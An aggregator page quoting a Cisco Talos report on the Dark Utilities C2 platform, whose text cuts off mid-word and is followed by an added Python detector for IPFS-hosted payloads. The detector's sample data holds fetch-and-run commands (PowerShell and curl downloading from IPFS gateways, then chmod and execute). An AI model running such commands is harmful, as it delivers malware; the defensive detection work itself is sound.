One Article Review

Home - The article:
Source CISCO Talos
Identifier 6123175
Publication date 2022-08-04 08:00:13 (viewed: 2022-08-04 12:06:28)
Title Attackers leveraging Dark Utilities "C2aaS" platform in malware campaigns
Text By Edmund Brumaghin, Azim Khodjibaev and Matt Thaxton, with contributions from Arnaud Zobec.

Executive Summary

Dark Utilities, released in early 2022, is a platform that provides full-featured C2 capabilities to adversaries. It is marketed as a means to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems. Payloads provided by the platform support Windows, Linux and Python-based implementations and are hosted within the Interplanetary File System (IPFS), making them resilient to content moderation or law enforcement intervention. Since its initial release, we've observed malware samples in the wild leveraging it to facilitate remote access and cryptocurrency mining.

What is "Dark Utilities?"

In early 2022, a new C2 platform called "Dark Utilities" was established, offering a variety of services such as remote system access, DDoS capabilities and cryptocurrency mining. The operators of the service also established Discord and Telegram communities where they provide technical support and assistance for customers on the platform. Dark Utilities provides payloads consisting of code that is executed on victim systems, allowing them to be registered with the service and establish a command and control (C2) communications channel. The platform currently supports Windows, Linux and Python-based payloads, allowing adversaries to target multiple architectures without requiring significant development resources. During our analysis, we observed efforts underway to expand OS and system architecture support as the platform continues to see ongoing develo
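The point a defender takes from the excerpt is that the payloads are fetched from IPFS rather than from an attacker-owned host, so a takedown of the usual kind does not help and the hunt has to key on the IPFS reference itself. The following is an added example for this page, not Cisco Talos code and not from the Dark Utilities platform: it scans process command lines for IPFS content identifiers (path-style `/ipfs/<CID>` and `ipfs://` URIs, plus the `<CID>.ipfs.<gateway>` subdomain form) and raises the score when a downloader and a drop-to-disk or execute hint appear on the same line. The gateway hostnames (`ipfs.io`, `dweb.link`), the downloader and drop/exec keyword lists, the CID regexes and all sample command lines are assumptions or constructed data, not indicators from the article.

```python
"""Flag process command lines that pull content from IPFS, the hosting layer the
article says Dark Utilities uses for its payloads. Added example for this page;
it is not Cisco Talos code, and the gateway hostnames, regexes and sample command
lines below are assumptions / constructed data, not indicators from the article."""
import re
from dataclasses import dataclass
from typing import List, Optional

# CIDv0 is "Qm" followed by 44 base58btc characters; CIDv1 as usually seen on HTTP
# gateways is base32 with the multibase prefix "b". Assumption: other multibase
# encodings are not handled, and any 20+ char base32 run after "b" is accepted.
CID_RE = r"(?:Qm[1-9A-HJ-NP-Za-km-z]{44}|b[a-z2-7]{20,})"
# Path-style gateway URL (https://<gateway>/ipfs/<cid>) or native ipfs:// URI.
IPFS_PATH_RE = re.compile(r"(?:ipfs://|/ipfs/)(" + CID_RE + r")")
# Subdomain-style gateway URL (https://<cid>.ipfs.<gateway>/).
IPFS_SUBDOMAIN_RE = re.compile(r"(" + CID_RE + r")\.ipfs\.")
# Tools that fetch a payload, and hints that the fetched file is written to disk or
# executed. Both keyword lists are assumptions chosen for this example.
DOWNLOADER_RE = re.compile(
    r"\b(curl|wget|powershell(?:\.exe)?|pwsh|Invoke-WebRequest|iwr|certutil)\b",
    re.IGNORECASE,
)
DROP_OR_EXEC_RE = re.compile(
    r"(chmod\s+\+x|-OutFile|\s-o\s|Start-Process|/tmp/|\$env:APPDATA)", re.IGNORECASE
)


@dataclass
class Finding:
    cid: str
    downloader: Optional[str]
    # 1 = IPFS reference only, 2 = fetched by a downloader, 3 = also dropped/executed
    score: int


def scan_command_line(cmd: str) -> List[Finding]:
    """Return one Finding per distinct CID referenced in a single command line."""
    cids = set(IPFS_PATH_RE.findall(cmd)) | set(IPFS_SUBDOMAIN_RE.findall(cmd))
    if not cids:
        return []
    dl = DOWNLOADER_RE.search(cmd)
    downloader = dl.group(1).lower() if dl else None
    score = 1 + (1 if downloader else 0) + (1 if DROP_OR_EXEC_RE.search(cmd) else 0)
    return [Finding(cid=c, downloader=downloader, score=score) for c in sorted(cids)]


# Constructed CIDs: right shape for the regexes, deliberately not real identifiers.
FAKE_CID_V0 = "Qm" + "SampeCidForDetectionTestNotRea" + "1" * 14  # 46 chars
FAKE_CID_V1 = "bafybeiconstructedsampecidforthetestonly"

# Constructed sample command lines, as EDR process-creation telemetry might show them.
SAMPLE_COMMAND_LINES = [
    # Windows: PowerShell pulling a file from a public gateway into %APPDATA%.
    'powershell.exe -noprofile -c "$uri=\'https://ipfs.io/ipfs/' + FAKE_CID_V0
    + '\'; iwr $uri -OutFile $env:APPDATA\\svc.exe"',
    # Linux: curl via a subdomain gateway, then mark executable and run.
    "curl -s https://" + FAKE_CID_V1 + ".ipfs.dweb.link/ -o /tmp/.x; chmod +x /tmp/.x; /tmp/.x",
    # Benign download with no IPFS reference at all.
    "curl -fsSL https://example.com/update.tar.gz -o /tmp/update.tar.gz",
    # IPFS reference without a downloader or drop/exec hint: lowest score.
    "firefox https://ipfs.io/ipfs/" + FAKE_CID_V1 + "/",
]


def scan_all(lines: Optional[List[str]] = None) -> List[List[Finding]]:
    """Scan every command line and return the findings per line."""
    return [scan_command_line(line) for line in (lines or SAMPLE_COMMAND_LINES)]


if __name__ == "__main__":
    for line, findings in zip(SAMPLE_COMMAND_LINES, scan_all()):
        for f in findings:
            print(f"score={f.score} downloader={f.downloader} cid={f.cid} :: {line[:60]}")
```

The score is deliberately coarse: a bare IPFS reference is common enough in legitimate traffic that it only becomes worth an analyst's time when the same command line also shows a fetch-and-run pattern. Hunting on the CID rather than the gateway hostname is what survives the hosting resilience the article describes, since the same content is reachable through any public gateway.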
Sent Yes
Tags Spam Malware Hack Tool Threat Guideline
Stories APT 19
Notes


The article does not appear to have been picked up after its publication.


The article does not appear to have been picked up from an earlier one.